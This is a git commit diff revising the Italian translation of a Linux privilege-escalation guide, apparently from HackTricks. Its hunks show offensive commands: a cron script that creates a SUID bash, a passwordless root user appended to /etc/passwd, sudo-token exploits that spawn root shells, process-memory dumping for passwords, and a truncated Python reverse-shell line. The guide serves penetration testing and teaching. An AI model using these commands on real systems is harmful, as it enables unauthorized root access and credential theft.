Translated ['src/linux-hardening/privilege-escalation/README.md'] to it

2025-10-10 18:36:50 +00:00 · 2025-06-07 16:45:04 +00:00 · 2025-06-07 16:45:04 +00:00 · 004fa4f37b
commit 004fa4f37b
parent 7dbb177210
13 changed files with 68 additions and 3307 deletions
--- a/src/SUMMARY.md
+++ b/src/SUMMARY.md
@ -793,6 +793,29 @@
 - [Windows Exploiting (Basic Guide - OSCP lvl)](binary-exploitation/windows-exploiting-basic-guide-oscp-lvl.md)
 - [iOS Exploiting](binary-exploitation/ios-exploiting.md)

+# 🤖 AI
+- [AI Security](AI/README.md)
+  - [AI Security Methodology](AI/AI-Deep-Learning.md)
+  - [AI MCP Security](AI/AI-MCP-Servers.md)
+  - [AI Model Data Preparation](AI/AI-Model-Data-Preparation-and-Evaluation.md)
+  - [AI Models RCE](AI/AI-Models-RCE.md)
+  - [AI Prompts](AI/AI-Prompts.md)
+  - [AI Risk Frameworks](AI/AI-Risk-Frameworks.md)
+  - [AI Supervised Learning Algorithms](AI/AI-Supervised-Learning-Algorithms.md)
+  - [AI Unsupervised Learning Algorithms](AI/AI-Unsupervised-Learning-algorithms.md)
+  - [AI Reinforcement Learning Algorithms](AI/AI-Reinforcement-Learning-Algorithms.md)
+  - [LLM Training](AI/AI-llm-architecture/README.md)
+    - [0. Basic LLM Concepts](AI/AI-llm-architecture/0.-basic-llm-concepts.md)
+    - [1. Tokenizing](AI/AI-llm-architecture/1.-tokenizing.md)
+    - [2. Data Sampling](AI/AI-llm-architecture/2.-data-sampling.md)
+    - [3. Token Embeddings](AI/AI-llm-architecture/3.-token-embeddings.md)
+    - [4. Attention Mechanisms](AI/AI-llm-architecture/4.-attention-mechanisms.md)
+    - [5. LLM Architecture](AI/AI-llm-architecture/5.-llm-architecture.md)
+    - [6. Pre-training & Loading models](AI/AI-llm-architecture/6.-pre-training-and-loading-models.md)
+    - [7.0. LoRA Improvements in fine-tuning](AI/AI-llm-architecture/7.0.-lora-improvements-in-fine-tuning.md)
+    - [7.1. Fine-Tuning for Classification](AI/AI-llm-architecture/7.1.-fine-tuning-for-classification.md)
+    - [7.2. Fine-Tuning to follow instructions](AI/AI-llm-architecture/7.2.-fine-tuning-to-follow-instructions.md)
+
 # 🔩 Reversing

 - [Reversing Tools & Basic Methods](reversing/reversing-tools-basic-methods/README.md)
@ -850,17 +873,6 @@
  - [Low-Power Wide Area Network](todo/radio-hacking/low-power-wide-area-network.md)
  - [Pentesting BLE - Bluetooth Low Energy](todo/radio-hacking/pentesting-ble-bluetooth-low-energy.md)
 - [Test LLMs](todo/test-llms.md)
- [LLM Training](todo/llm-training-data-preparation/README.md)
-  - [0. Basic LLM Concepts](todo/llm-training-data-preparation/0.-basic-llm-concepts.md)
-  - [1. Tokenizing](todo/llm-training-data-preparation/1.-tokenizing.md)
-  - [2. Data Sampling](todo/llm-training-data-preparation/2.-data-sampling.md)
-  - [3. Token Embeddings](todo/llm-training-data-preparation/3.-token-embeddings.md)
-  - [4. Attention Mechanisms](todo/llm-training-data-preparation/4.-attention-mechanisms.md)
-  - [5. LLM Architecture](todo/llm-training-data-preparation/5.-llm-architecture.md)
-  - [6. Pre-training & Loading models](todo/llm-training-data-preparation/6.-pre-training-and-loading-models.md)
-  - [7.0. LoRA Improvements in fine-tuning](todo/llm-training-data-preparation/7.0.-lora-improvements-in-fine-tuning.md)
-  - [7.1. Fine-Tuning for Classification](todo/llm-training-data-preparation/7.1.-fine-tuning-for-classification.md)
-  - [7.2. Fine-Tuning to follow instructions](todo/llm-training-data-preparation/7.2.-fine-tuning-to-follow-instructions.md)
 - [Burp Suite](todo/burp-suite.md)
 - [Other Web Tricks](todo/other-web-tricks.md)
 - [Interesting HTTP$$external:todo/interesting-http.md$$]()
--- a/src/linux-hardening/privilege-escalation/README.md
+++ b/src/linux-hardening/privilege-escalation/README.md
@ -4,9 +4,9 @@

 ## Informazioni sul sistema

-### Informazioni sul SO
+### Info OS

-Iniziamo a ottenere alcune informazioni sul SO in esecuzione
+Iniziamo a ottenere alcune informazioni sul sistema operativo in esecuzione
 ```bash
 (cat /proc/version || uname -a ) 2>/dev/null
 lsb_release -a 2>/dev/null # old, not by default on many systems
@ -148,7 +148,7 @@ Controlla anche se **è installato un compilatore**. Questo è utile se hai biso
 ```bash
 (dpkg --list 2>/dev/null | grep "compiler" | grep -v "decompiler\|lib" 2>/dev/null || yum list installed 'gcc*' 2>/dev/null | grep gcc 2>/dev/null; which gcc g++ 2>/dev/null || locate -r "/gcc[0-9\.-]\+$" 2>/dev/null | grep -v "/doc/")
 ```
-### Software Vulnerabile Installato
+### Vulnerable Software Installed

 Controlla la **versione dei pacchetti e dei servizi installati**. Potrebbe esserci qualche vecchia versione di Nagios (ad esempio) che potrebbe essere sfruttata per l'escalation dei privilegi...\
 Si consiglia di controllare manualmente la versione del software installato più sospetto.
@ -168,7 +168,7 @@ ps aux
 ps -ef
 top -n 1
 ```
-Controlla sempre la presenza di [**debugger electron/cef/chromium**] in esecuzione, potresti abusarne per elevare i privilegi](electron-cef-chromium-debugger-abuse.md). **Linpeas** li rileva controllando il parametro `--inspect` all'interno della riga di comando del processo.\
+Controlla sempre la presenza di [**debugger electron/cef/chromium** in esecuzione, potresti abusarne per elevare i privilegi](electron-cef-chromium-debugger-abuse.md). **Linpeas** li rileva controllando il parametro `--inspect` all'interno della riga di comando del processo.\
 Controlla anche **i tuoi privilegi sui binari dei processi**, forse puoi sovrascrivere qualcuno.

 ### Monitoraggio dei processi
@ -186,10 +186,10 @@ Tuttavia, ricorda che **come utente normale puoi leggere la memoria dei processi
 >
 > Il file _**/proc/sys/kernel/yama/ptrace_scope**_ controlla l'accessibilità di ptrace:
 >
-> - **kernel.yama.ptrace_scope = 0**: tutti i processi possono essere debugged, purché abbiano lo stesso uid. Questo è il modo classico in cui funzionava il ptracing.
+> - **kernel.yama.ptrace_scope = 0**: tutti i processi possono essere debugged, purché abbiano lo stesso uid. Questo è il modo classico in cui funzionava ptracing.
 > - **kernel.yama.ptrace_scope = 1**: solo un processo padre può essere debugged.
 > - **kernel.yama.ptrace_scope = 2**: solo l'amministratore può utilizzare ptrace, poiché richiede la capacità CAP_SYS_PTRACE.
-> - **kernel.yama.ptrace_scope = 3**: Nessun processo può essere tracciato con ptrace. Una volta impostato, è necessario un riavvio per abilitare nuovamente il ptracing.
+> - **kernel.yama.ptrace_scope = 3**: Nessun processo può essere tracciato con ptrace. Una volta impostato, è necessario un riavvio per abilitare nuovamente ptracing.

 #### GDB

@ -215,7 +215,7 @@ done
 ```
 #### /proc/$pid/maps & /proc/$pid/mem

-Per un dato ID di processo, **maps mostra come la memoria è mappata all'interno dello spazio degli indirizzi virtuali di quel processo**; mostra anche le **permissive di ciascuna regione mappata**. Il **mem** pseudo file **espone la memoria dei processi stessi**. Dal file **maps** sappiamo quali **regioni di memoria sono leggibili** e i loro offset. Utilizziamo queste informazioni per **cercare nel file mem e scaricare tutte le regioni leggibili** in un file.
+Per un dato ID processo, **maps mostra come la memoria è mappata all'interno dello spazio degli indirizzi virtuali di quel processo**; mostra anche le **permissive di ciascuna regione mappata**. Il **mem** pseudo file **espone la memoria dei processi stessi**. Dal file **maps** sappiamo quali **regioni di memoria sono leggibili** e i loro offset. Utilizziamo queste informazioni per **cercare nel file mem e scaricare tutte le regioni leggibili** in un file.
 ```bash
 procdump()
 (
@ -237,7 +237,7 @@ strings /dev/mem -n10 | grep -i PASS
 ```
 ### ProcDump per linux

-ProcDump è una reinterpretazione per Linux del classico strumento ProcDump della suite di strumenti Sysinternals per Windows. Ottienilo su [https://github.com/Sysinternals/ProcDump-for-Linux](https://github.com/Sysinternals/ProcDump-for-Linux)
+ProcDump è una reinterpretazione per Linux dello strumento classico ProcDump della suite di strumenti Sysinternals per Windows. Ottienilo su [https://github.com/Sysinternals/ProcDump-for-Linux](https://github.com/Sysinternals/ProcDump-for-Linux)
 ```
 procdump -p 1714

@ -327,7 +327,7 @@ Ad esempio, all'interno di _/etc/crontab_ puoi trovare il PATH: _PATH=**/home/us

 (_Nota come l'utente "user" ha privilegi di scrittura su /home/user_)

-Se all'interno di questo crontab l'utente root cerca di eseguire qualche comando o script senza impostare il percorso. Ad esempio: _\* \* \* \* root overwrite.sh_\
+Se all'interno di questo crontab l'utente root prova a eseguire qualche comando o script senza impostare il percorso. Ad esempio: _\* \* \* \* root overwrite.sh_\
 Allora, puoi ottenere una shell root usando:
 ```bash
 echo 'cp /bin/bash /tmp/bash; chmod +s /tmp/bash' > /home/user/overwrite.sh
@ -385,7 +385,7 @@ Ad esempio, crea il tuo backdoor all'interno del file .service con **`ExecStart=

 ### Binaries di servizio scrivibili

-Tieni presente che se hai **permessi di scrittura sui binary eseguiti dai servizi**, puoi cambiarli con backdoor in modo che quando i servizi vengono rieseguiti, le backdoor verranno eseguite.
+Tieni presente che se hai **permessi di scrittura sui binary eseguiti dai servizi**, puoi cambiarli con backdoor in modo che quando i servizi vengono rieseguiti, le backdoor vengano eseguite.

 ### systemd PATH - Percorsi relativi

@ -403,9 +403,9 @@ Poi, crea un **eseguibile** con lo **stesso nome del percorso relativo del binar

 **Scopri di più sui servizi con `man systemd.service`.**

-## **Timers**
+## **Timer**

-I **Timers** sono file di unità systemd il cui nome termina con `**.timer**` che controllano i file `**.service**` o eventi. I **Timers** possono essere utilizzati come alternativa a cron poiché hanno supporto integrato per eventi di tempo calendario e eventi di tempo monotono e possono essere eseguiti in modo asincrono.
+I **Timer** sono file di unità systemd il cui nome termina con `**.timer**` che controllano i file `**.service**` o eventi. I **Timer** possono essere utilizzati come alternativa a cron poiché hanno supporto integrato per eventi di tempo del calendario e eventi di tempo monotono e possono essere eseguiti in modo asincrono.

 Puoi enumerare tutti i timer con:
 ```bash
@ -419,7 +419,7 @@ Unit=backdoor.service
 ```
 Nella documentazione puoi leggere cosa è l'Unit:

-> L'unità da attivare quando questo timer scade. L'argomento è un nome di unità, il cui suffisso non è ".timer". Se non specificato, questo valore predefinito è un servizio che ha lo stesso nome dell'unità timer, tranne per il suffisso. (Vedi sopra.) Si raccomanda che il nome dell'unità che viene attivata e il nome dell'unità del timer siano nominati in modo identico, tranne per il suffisso.
+> L'unità da attivare quando questo timer scade. L'argomento è un nome di unità, il cui suffisso non è ".timer". Se non specificato, questo valore predefinito è un servizio che ha lo stesso nome dell'unità timer, tranne per il suffisso. (Vedi sopra.) Si raccomanda che il nome dell'unità che viene attivata e il nome dell'unità del timer siano nominati identicamente, tranne per il suffisso.

 Pertanto, per abusare di questo permesso dovresti:

@ -446,7 +446,7 @@ I sockets possono essere configurati utilizzando file `.socket`.
 **Scopri di più sui sockets con `man systemd.socket`.** All'interno di questo file, possono essere configurati diversi parametri interessanti:

 - `ListenStream`, `ListenDatagram`, `ListenSequentialPacket`, `ListenFIFO`, `ListenSpecial`, `ListenNetlink`, `ListenMessageQueue`, `ListenUSBFunction`: Queste opzioni sono diverse ma viene utilizzato un riepilogo per **indicare dove ascolterà** il socket (il percorso del file socket AF_UNIX, l'IPv4/6 e/o il numero di porta da ascoltare, ecc.)
- `Accept`: Accetta un argomento booleano. Se **vero**, una **istanza di servizio viene generata per ogni connessione in arrivo** e solo il socket di connessione viene passato ad essa. Se **falso**, tutti i socket di ascolto stessi sono **passati all'unità di servizio avviata**, e solo un'unità di servizio viene generata per tutte le connessioni. Questo valore viene ignorato per i socket datagram e le FIFO dove un'unica unità di servizio gestisce incondizionatamente tutto il traffico in arrivo. **Di default è falso**. Per motivi di prestazioni, si raccomanda di scrivere nuovi demoni solo in un modo che sia adatto per `Accept=no`.
+- `Accept`: Accetta un argomento booleano. Se **vero**, una **istanza di servizio viene generata per ogni connessione in arrivo** e solo il socket di connessione viene passato ad essa. Se **falso**, tutti i sockets di ascolto stessi sono **passati all'unità di servizio avviata**, e solo un'unità di servizio viene generata per tutte le connessioni. Questo valore viene ignorato per i sockets datagram e le FIFO dove un'unica unità di servizio gestisce incondizionatamente tutto il traffico in arrivo. **Di default è falso**. Per motivi di prestazioni, si raccomanda di scrivere nuovi demoni solo in un modo che sia adatto per `Accept=no`.
 - `ExecStartPre`, `ExecStartPost`: Accetta una o più righe di comando, che vengono **eseguite prima** o **dopo** che i **sockets**/FIFO di ascolto siano **creati** e legati, rispettivamente. Il primo token della riga di comando deve essere un nome di file assoluto, seguito da argomenti per il processo.
 - `ExecStopPre`, `ExecStopPost`: Comandi aggiuntivi che vengono **eseguiti prima** o **dopo** che i **sockets**/FIFO di ascolto siano **chiusi** e rimossi, rispettivamente.
 - `Service`: Specifica il nome dell'unità di **servizio** **da attivare** sul **traffico in arrivo**. Questa impostazione è consentita solo per i sockets con Accept=no. Di default è impostato sul servizio che porta lo stesso nome del socket (con il suffisso sostituito). Nella maggior parte dei casi, non dovrebbe essere necessario utilizzare questa opzione.
@ -481,7 +481,7 @@ socket-command-injection.md

 ### Sockets HTTP

-Nota che potrebbero esserci alcuni **sockets in ascolto per richieste HTTP** (_non sto parlando di file .socket ma dei file che fungono da sockets unix_). Puoi verificare questo con:
+Nota che potrebbero esserci alcuni **sockets in ascolto per richieste HTTP** (_Non sto parlando di file .socket ma dei file che fungono da sockets unix_). Puoi verificare questo con:
 ```bash
 curl --max-time 2 --unix-socket /pat/to/socket/files http:/index
 ```
@ -489,7 +489,7 @@ Se il socket **risponde con una richiesta HTTP**, allora puoi **comunicare** con

 ### Socket Docker Scrivibile

-Il socket Docker, spesso trovato in `/var/run/docker.sock`, è un file critico che dovrebbe essere protetto. Per impostazione predefinita, è scrivibile dall'utente `root` e dai membri del gruppo `docker`. Possedere l'accesso in scrittura a questo socket può portare a un'escalation dei privilegi. Ecco una panoramica di come ciò può essere fatto e metodi alternativi se il Docker CLI non è disponibile.
+Il socket Docker, spesso trovato in `/var/run/docker.sock`, è un file critico che dovrebbe essere protetto. Per impostazione predefinita, è scrivibile dall'utente `root` e dai membri del gruppo `docker`. Possedere accesso in scrittura a questo socket può portare a un'escalation dei privilegi. Ecco una panoramica di come ciò può essere fatto e metodi alternativi se il Docker CLI non è disponibile.

 #### **Escalation dei Privilegi con Docker CLI**

@ -536,7 +536,7 @@ Dopo aver impostato la connessione `socat`, puoi eseguire comandi direttamente n

 ### Altri

-Nota che se hai permessi di scrittura sul socket docker perché sei **all'interno del gruppo `docker`** hai [**più modi per elevare i privilegi**](interesting-groups-linux-pe/index.html#docker-group). Se l'[**API docker sta ascoltando su una porta** puoi anche essere in grado di comprometterla](../../network-services-pentesting/2375-pentesting-docker.md#compromising).
+Nota che se hai permessi di scrittura sul socket docker perché sei **all'interno del gruppo `docker`** hai [**più modi per elevare i privilegi**](interesting-groups-linux-pe/index.html#docker-group). Se l' [**API docker sta ascoltando su una porta** puoi anche essere in grado di comprometterla](../../network-services-pentesting/2375-pentesting-docker.md#compromising).

 Controlla **altri modi per uscire da docker o abusarne per elevare i privilegi** in:

@ -564,13 +564,13 @@ runc-privilege-escalation.md

 D-Bus è un sofisticato **sistema di comunicazione inter-processo (IPC)** che consente alle applicazioni di interagire e condividere dati in modo efficiente. Progettato tenendo presente il moderno sistema Linux, offre un robusto framework per diverse forme di comunicazione tra applicazioni.

-Il sistema è versatile, supportando IPC di base che migliora lo scambio di dati tra processi, simile a **socket di dominio UNIX migliorati**. Inoltre, aiuta a trasmettere eventi o segnali, favorendo un'integrazione fluida tra i componenti del sistema. Ad esempio, un segnale da un demone Bluetooth riguardo a una chiamata in arrivo può indurre un lettore musicale a silenziare, migliorando l'esperienza dell'utente. Inoltre, D-Bus supporta un sistema di oggetti remoti, semplificando le richieste di servizio e le invocazioni di metodo tra le applicazioni, snellendo processi che erano tradizionalmente complessi.
+Il sistema è versatile, supportando IPC di base che migliora lo scambio di dati tra processi, simile a **socket di dominio UNIX migliorati**. Inoltre, aiuta a trasmettere eventi o segnali, favorendo un'integrazione senza soluzione di continuità tra i componenti del sistema. Ad esempio, un segnale da un demone Bluetooth riguardo a una chiamata in arrivo può indurre un lettore musicale a silenziarsi, migliorando l'esperienza dell'utente. Inoltre, D-Bus supporta un sistema di oggetti remoti, semplificando le richieste di servizio e le invocazioni di metodo tra le applicazioni, snellendo processi che erano tradizionalmente complessi.

 D-Bus opera su un **modello di autorizzazione/negazione**, gestendo i permessi dei messaggi (chiamate di metodo, emissioni di segnali, ecc.) in base all'effetto cumulativo delle regole di policy corrispondenti. Queste politiche specificano le interazioni con il bus, consentendo potenzialmente l'elevazione dei privilegi attraverso lo sfruttamento di questi permessi.

 Un esempio di tale politica in `/etc/dbus-1/system.d/wpa_supplicant.conf` è fornito, dettagliando i permessi per l'utente root di possedere, inviare e ricevere messaggi da `fi.w1.wpa_supplicant1`.

-Le politiche senza un utente o gruppo specificato si applicano universalmente, mentre le politiche di contesto "predefinite" si applicano a tutti non coperti da altre politiche specifiche.
+Le politiche senza un utente o gruppo specificato si applicano universalmente, mentre le politiche di contesto "predefinite" si applicano a tutti quelli non coperti da altre politiche specifiche.
 ```xml
 <policy user="root">
 <allow own="fi.w1.wpa_supplicant1"/>
@ -612,7 +612,7 @@ cat /etc/networks
 #Files used by network services
 lsof -i
 ```
-### Open ports
+### Porte aperte

 Controlla sempre i servizi di rete in esecuzione sulla macchina con cui non sei stato in grado di interagire prima di accedervi:
 ```bash
@ -755,7 +755,7 @@ sudo less /var/log/something /etc/shadow #Red 2 files
 ```
 **Contromisure**: [https://blog.compass-security.com/2012/10/dangerous-sudoers-entries-part-5-recapitulation/](https://blog.compass-security.com/2012/10/dangerous-sudoers-entries-part-5-recapitulation/)

-### Comando Sudo/Binary SUID senza percorso del comando
+### Comando Sudo/Binario SUID senza percorso del comando

 Se il **permesso sudo** è dato a un singolo comando **senza specificare il percorso**: _hacker10 ALL= (root) less_ puoi sfruttarlo cambiando la variabile PATH
 ```bash
@ -840,7 +840,7 @@ Quando si incontra un binario con permessi **SUID** che sembra insolito, è buon
 ```bash
 strace <SUID-BINARY> 2>&1 | grep -i -E "open|access|no such file"
 ```
-Ad esempio, incontrare un errore come _"open(“/path/to/.config/libcalc.so”, O_RDONLY) = -1 ENOENT (Nessun file o directory)"_ suggerisce un potenziale per l'exploitation.
+Ad esempio, incontrare un errore come _"open(“/path/to/.config/libcalc.so”, O_RDONLY) = -1 ENOENT (Nessun file o directory di questo tipo)"_ suggerisce un potenziale per l'exploitation.

 Per sfruttare questo, si procederebbe creando un file C, ad esempio _"/path/to/.config/libcalc.c"_, contenente il seguente codice:
 ```c
@ -920,7 +920,7 @@ Nei casi in cui hai **accesso sudo** ma non la password, puoi elevare i privileg
 Requisiti per elevare i privilegi:

 - Hai già una shell come utente "_sampleuser_"
- "_sampleuser_" ha **usato `sudo`** per eseguire qualcosa negli **ultimi 15 minuti** (per impostazione predefinita, questa è la durata del token sudo che ci consente di usare `sudo` senza inserire alcuna password)
+- "_sampleuser_" ha **usato `sudo`** per eseguire qualcosa negli **ultimi 15 minuti** (per impostazione predefinita è la durata del token sudo che ci consente di usare `sudo` senza inserire alcuna password)
 - `cat /proc/sys/kernel/yama/ptrace_scope` è 0
 - `gdb` è accessibile (puoi essere in grado di caricarlo)

@ -934,7 +934,7 @@ bash exploit.sh
 /tmp/activate_sudo_token
 sudo su
 ```
- Il **secondo exploit** (`exploit_v2.sh`) creerà una shell sh in _/tmp_ **di proprietà di root con setuid**
+- Il **secondo exploit** (`exploit_v2.sh`) creerà una shell sh in _/tmp_ **possessa da root con setuid**
 ```bash
 bash exploit_v2.sh
 /tmp/sh -p
@ -946,7 +946,7 @@ sudo su
 ```
 ### /var/run/sudo/ts/\<Username>

-Se hai **permessi di scrittura** nella cartella o su uno dei file creati all'interno della cartella, puoi utilizzare il binario [**write_sudo_token**](https://github.com/nongiach/sudo_inject/tree/master/extra_tools) per **creare un token sudo per un utente e un PID**.\
+Se hai **permessi di scrittura** nella cartella o su uno dei file creati all'interno della cartella, puoi utilizzare il binario [**write_sudo_token**](https://github.com/nongiach/sudo_inject/tree/master/extra_tools) per **creare un token sudo per un utente e PID**.\
 Ad esempio, se puoi sovrascrivere il file _/var/run/sudo/ts/sampleuser_ e hai una shell come quell'utente con PID 1234, puoi **ottenere privilegi sudo** senza bisogno di conoscere la password eseguendo:
 ```bash
 ./write_sudo_token 1234 > /var/run/sudo/ts/sampleuser
@ -981,7 +981,7 @@ permit nopass demo as root cmd vim

 Se sai che un **utente di solito si connette a una macchina e usa `sudo`** per elevare i privilegi e hai ottenuto una shell all'interno di quel contesto utente, puoi **creare un nuovo eseguibile sudo** che eseguirà il tuo codice come root e poi il comando dell'utente. Poi, **modifica il $PATH** del contesto utente (ad esempio aggiungendo il nuovo percorso in .bash_profile) in modo che quando l'utente esegue sudo, il tuo eseguibile sudo venga eseguito.

-Nota che se l'utente utilizza una shell diversa (non bash) dovrai modificare altri file per aggiungere il nuovo percorso. Ad esempio, [sudo-piggyback](https://github.com/APTy/sudo-piggyback) modifica `~/.bashrc`, `~/.zshrc`, `~/.bash_profile`. Puoi trovare un altro esempio in [bashdoor.py](https://github.com/n00py/pOSt-eX/blob/master/empire_modules/bashdoor.py)
+Nota che se l'utente utilizza una shell diversa (non bash) dovrai modificare altri file per aggiungere il nuovo percorso. Ad esempio[ sudo-piggyback](https://github.com/APTy/sudo-piggyback) modifica `~/.bashrc`, `~/.zshrc`, `~/.bash_profile`. Puoi trovare un altro esempio in [bashdoor.py](https://github.com/n00py/pOSt-eX/blob/master/empire_modules/bashdoor.py)

 O eseguendo qualcosa come:
 ```bash
@ -1055,14 +1055,14 @@ Leggi la pagina seguente per **scoprire di più sulle capacità e su come abusar
 linux-capabilities.md
 {{#endref}}

-## Permessi di directory
+## Permessi delle directory

 In una directory, il **bit per "eseguire"** implica che l'utente interessato può "**cd**" nella cartella.\
 Il bit **"leggi"** implica che l'utente può **elencare** i **file**, e il bit **"scrivi"** implica che l'utente può **cancellare** e **creare** nuovi **file**.

 ## ACL

-Le Liste di Controllo degli Accessi (ACL) rappresentano il secondo livello di permessi discrezionali, capaci di **sovrascrivere i tradizionali permessi ugo/rwx**. Questi permessi migliorano il controllo sull'accesso a file o directory consentendo o negando diritti a utenti specifici che non sono i proprietari o parte del gruppo. Questo livello di **granularità garantisce una gestione degli accessi più precisa**. Ulteriori dettagli possono essere trovati [**qui**](https://linuxconfig.org/how-to-manage-acls-on-linux).
+Le Liste di Controllo degli Accessi (ACL) rappresentano il secondo livello di permessi discrezionali, capaci di **sovrascrivere i tradizionali permessi ugo/rwx**. Questi permessi migliorano il controllo sull'accesso ai file o alle directory consentendo o negando diritti a utenti specifici che non sono i proprietari o parte del gruppo. Questo livello di **granularità garantisce una gestione degli accessi più precisa**. Ulteriori dettagli possono essere trovati [**qui**](https://linuxconfig.org/how-to-manage-acls-on-linux).

 **Dai** all'utente "kali" permessi di lettura e scrittura su un file:
 ```bash
@ -1075,14 +1075,14 @@ setfacl -b file.txt #Remove the ACL of the file
 ```bash
 getfacl -t -s -R -p /bin /etc /home /opt /root /sbin /usr /tmp 2>/dev/null
 ```
-## Open shell sessions
+## Aprire sessioni di shell

-In **vecchie versioni** puoi **dirottare** alcune **sessioni shell** di un altro utente (**root**).\
-Nelle **versioni più recenti** sarai in grado di **connetterti** solo alle sessioni screen del **tuo utente**. Tuttavia, potresti trovare **informazioni interessanti all'interno della sessione**.
+In **vecchie versioni** potresti **dirottare** alcune sessioni di **shell** di un altro utente (**root**).\
+Nelle **versioni più recenti** sarai in grado di **connetterti** solo alle sessioni di schermo del **tuo utente**. Tuttavia, potresti trovare **informazioni interessanti all'interno della sessione**.

-### screen sessions hijacking
+### dirottamento delle sessioni di schermo

-**Elenca le sessioni screen**
+**Elenca le sessioni di schermo**
 ```bash
 screen -ls
 screen -ls <username>/ # Show another user' screen sessions
@ -1123,10 +1123,10 @@ Controlla **Valentine box from HTB** per un esempio.

 ### Debian OpenSSL Predictable PRNG - CVE-2008-0166

-Tutte le chiavi SSL e SSH generate su sistemi basati su Debian (Ubuntu, Kubuntu, ecc.) tra settembre 2006 e il 13 maggio 2008 potrebbero essere affette da questo bug.\
-Questo bug è causato quando si crea una nuova chiave ssh in quei sistemi operativi, poiché **erano possibili solo 32.768 variazioni**. Ciò significa che tutte le possibilità possono essere calcolate e **avendo la chiave pubblica ssh puoi cercare la corrispondente chiave privata**. Puoi trovare le possibilità calcolate qui: [https://github.com/g0tmi1k/debian-ssh](https://github.com/g0tmi1k/debian-ssh)
+Tutti le chiavi SSL e SSH generate su sistemi basati su Debian (Ubuntu, Kubuntu, ecc.) tra settembre 2006 e il 13 maggio 2008 potrebbero essere affette da questo bug.\
+Questo bug è causato quando si crea una nuova chiave ssh in quei sistemi operativi, poiché **erano possibili solo 32.768 variazioni**. Questo significa che tutte le possibilità possono essere calcolate e **avendo la chiave pubblica ssh puoi cercare la corrispondente chiave privata**. Puoi trovare le possibilità calcolate qui: [https://github.com/g0tmi1k/debian-ssh](https://github.com/g0tmi1k/debian-ssh)

-### Valori di configurazione SSH interessanti
+### SSH Valori di configurazione interessanti

 - **PasswordAuthentication:** Specifica se l'autenticazione tramite password è consentita. Il valore predefinito è `no`.
 - **PubkeyAuthentication:** Specifica se l'autenticazione tramite chiave pubblica è consentita. Il valore predefinito è `yes`.
@ -1134,7 +1134,7 @@ Questo bug è causato quando si crea una nuova chiave ssh in quei sistemi operat

 ### PermitRootLogin

-Specifica se l'utente root può accedere utilizzando ssh, il valore predefinito è `no`. Valori possibili:
+Specifica se root può accedere utilizzando ssh, il valore predefinito è `no`. Valori possibili:

 - `yes`: root può accedere utilizzando password e chiave privata
 - `without-password` o `prohibit-password`: root può accedere solo con una chiave privata
@ -1161,7 +1161,7 @@ ForwardAgent yes
 Nota che se `Host` è `*` ogni volta che l'utente passa a un'altra macchina, quel host sarà in grado di accedere alle chiavi (il che rappresenta un problema di sicurezza).

 Il file `/etc/ssh_config` può **sovrascrivere** queste **opzioni** e consentire o negare questa configurazione.\
-Il file `/etc/sshd_config` può **consentire** o **negare** il forwarding dell'agent ssh con la parola chiave `AllowAgentForwarding` (il valore predefinito è consentito).
+Il file `/etc/sshd_config` può **consentire** o **negare** il forwarding dell'ssh-agent con la parola chiave `AllowAgentForwarding` (il valore predefinito è consentito).

 Se scopri che il Forward Agent è configurato in un ambiente leggi la seguente pagina in quanto **potresti essere in grado di abusarne per escalare i privilegi**:

@ -1214,7 +1214,7 @@ ATTENZIONE: potresti compromettere la sicurezza attuale della macchina.
 echo 'dummy::0:0::/root:/bin/bash' >>/etc/passwd
 su - dummy
 ```
-NOTA: Sulle piattaforme BSD, `/etc/passwd` si trova in `/etc/pwd.db` e `/etc/master.passwd`, inoltre `/etc/shadow` è rinominato in `/etc/spwd.db`.
+NOTA: Sulle piattaforme BSD `/etc/passwd` si trova in `/etc/pwd.db` e `/etc/master.passwd`, inoltre `/etc/shadow` è rinominato in `/etc/spwd.db`.

 Dovresti controllare se puoi **scrivere in alcuni file sensibili**. Ad esempio, puoi scrivere in qualche **file di configurazione del servizio**?
 ```bash
@ -1235,7 +1235,7 @@ Le seguenti cartelle potrebbero contenere backup o informazioni interessanti: **
 ```bash
 ls -a /tmp /var/tmp /var/backups /var/mail/ /var/spool/mail/ /root
 ```
-### Posizione strana/File di proprietà
+### Posizioni strane/File di proprietà
 ```bash
 #root owned files in /home folders
 find /home -user root 2>/dev/null
@ -1292,7 +1292,7 @@ Leggi il codice di [**linPEAS**](https://github.com/carlospolop/privilege-escala
 ### Log

 Se puoi leggere i log, potresti essere in grado di trovare **informazioni interessanti/confidenziali al loro interno**. Più strano è il log, più interessante sarà (probabilmente).\
-Inoltre, alcuni log di **audit** configurati in modo "**errato**" (con backdoor?) potrebbero consentirti di **registrare password** all'interno dei log di audit come spiegato in questo post: [https://www.redsiege.com/blog/2019/05/logging-passwords-on-linux/](https://www.redsiege.com/blog/2019/05/logging-passwords-on-linux/).
+Inoltre, alcuni log di **audit** "mal" configurati (backdoored?) potrebbero permetterti di **registrare password** all'interno dei log di audit come spiegato in questo post: [https://www.redsiege.com/blog/2019/05/logging-passwords-on-linux/](https://www.redsiege.com/blog/2019/05/logging-passwords-on-linux/).
 ```bash
 aureport --tty | grep -E "su |sudo " | sed -E "s,su|sudo,${C}[1;31m&${C}[0m,g"
 grep -RE 'comm="su"|comm="sudo"' /var/log* 2>/dev/null
@ -1329,7 +1329,7 @@ import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s

 Una vulnerabilità in `logrotate` consente agli utenti con **permessi di scrittura** su un file di log o le sue directory genitore di potenzialmente ottenere privilegi elevati. Questo perché `logrotate`, che spesso viene eseguito come **root**, può essere manipolato per eseguire file arbitrari, specialmente in directory come _**/etc/bash_completion.d/**_. È importante controllare i permessi non solo in _/var/log_ ma anche in qualsiasi directory in cui viene applicata la rotazione dei log.

-> [!NOTE]
+> [!TIP]
 > Questa vulnerabilità colpisce `logrotate` versione `3.18.0` e versioni precedenti

 Informazioni più dettagliate sulla vulnerabilità possono essere trovate su questa pagina: [https://tech.feedyourhead.at/content/details-of-a-logrotate-race-condition](https://tech.feedyourhead.at/content/details-of-a-logrotate-race-condition).
@ -1344,11 +1344,11 @@ Questa vulnerabilità è molto simile a [**CVE-2016-1247**](https://www.cvedetai

 Se, per qualsiasi motivo, un utente è in grado di **scrivere** uno script `ifcf-<whatever>` in _/etc/sysconfig/network-scripts_ **o** può **modificare** uno esistente, allora il tuo **sistema è compromesso**.

-Gli script di rete, _ifcg-eth0_ ad esempio, vengono utilizzati per le connessioni di rete. Sembrano esattamente come file .INI. Tuttavia, sono \~sourced\~ su Linux dal Network Manager (dispatcher.d).
